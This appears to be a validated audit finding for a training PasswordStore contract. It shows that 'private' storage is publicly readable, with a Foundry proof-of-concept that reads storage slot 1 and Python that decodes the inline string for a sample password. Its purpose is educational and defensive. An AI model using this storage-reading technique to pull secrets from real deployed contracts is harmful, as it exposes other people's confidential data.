Submission Details
Severity: high
Valid

Unencrypted Private Data On-Chain

Summary

Attackers can look at the contract's transactions and raw state to determine the password stored in the contract and retrieve it.

Vulnerability Details

Private variables are not directly readable by another user or contract through Solidity; however, this does not prevent anyone from reading the raw state of the contract.
Add the following test to PasswordStore.t.sol as a PoC:

```solidity
function test_load_password() public {
    address attacker = address(1);
    vm.startPrank(attacker);
    // The attacker is not the owner
    assertEq(owner == attacker, false);
    // Read the raw storage word directly from the contract:
    // slot 0 holds the owner address, the password string is stored in slot 1
    bytes32 passwordBytes32 = vm.load(
        address(passwordStore),
        bytes32(uint256(1))
    );
    // Cast the raw word back to a string (the password is shorter than 32 bytes, so it is stored inline)
    string memory password_steal = string(
        abi.encode(bytes32(passwordBytes32))
    );
    vm.stopPrank();
    console.log("Password: ", password_steal);
}
```
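The PoC works because a Solidity `string` shorter than 32 bytes is kept inline in its slot: the bytes occupy the high end of the word and the lowest byte holds `length * 2`; a string of 32 bytes or more keeps only `length * 2 + 1` in the slot and places its data at `keccak256(slot)`. The following Python is an added example, not part of the original submission or the PasswordStore code: it builds the slot word for a constructed sample password, decodes it correctly, and shows why the raw cast used in the PoC carries a trailing length byte. The function names are this example's own.

```python
from typing import Optional

def encode_short_string_slot(value: bytes) -> bytes:
    """Build the 32-byte word the EVM keeps for an inline (< 32 byte) string."""
    if len(value) >= 32:
        raise ValueError("strings of 32 bytes or more are not stored inline")
    # data left-aligned, zero padding, then length * 2 in the lowest byte
    return value.ljust(31, b"\x00") + bytes([len(value) * 2])

def decode_string_slot(word: bytes) -> Optional[bytes]:
    """Recover the string from a raw slot word.

    Returns None for a long string, whose data lives at keccak256(slot)
    rather than in the slot itself (not resolved here).
    """
    if len(word) != 32:
        raise ValueError("a storage word is exactly 32 bytes")
    flag = word[31]
    if flag & 1:
        return None  # long-string marker: slot holds 2 * length + 1
    length = flag // 2
    if length > 31:
        raise ValueError("corrupt inline string word")
    return word[:length]

def long_string_length(word: bytes) -> int:
    """Length of a long string from its slot word (data is at keccak256(slot))."""
    flag = int.from_bytes(word, "big")
    if not flag & 1:
        raise ValueError("not a long-string slot word")
    return (flag - 1) // 2

def naive_cast(word: bytes) -> bytes:
    """What string(abi.encode(word)) yields in the PoC: all 32 bytes, length byte included."""
    return word

# Constructed sample: the slot-1 word an EVM would hold for the password "myPassword".
SAMPLE_PASSWORD = b"myPassword"
SAMPLE_WORD = encode_short_string_slot(SAMPLE_PASSWORD)

if __name__ == "__main__":
    print("raw slot word :", SAMPLE_WORD.hex())
    print("naive cast    :", naive_cast(SAMPLE_WORD))
    print("decoded       :", decode_string_slot(SAMPLE_WORD))
```

The same decoding applies to a word obtained from any node via `eth_getStorageAt`, which is the point of the finding: nothing in the `private` keyword keeps the slot contents off the public ledger. Note that a stored hash is public in exactly the same way, so hashing only helps when the password has enough entropy that an offline brute force is impractical.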

Impact

The password can be read by anyone, not only the owner.

Tools Used

Manual Review / Foundry

Recommendations

  • Any private data should either be stored off-chain or carefully encrypted.

  • Store only a hash of the password and use it for verification only.

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible to the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential.
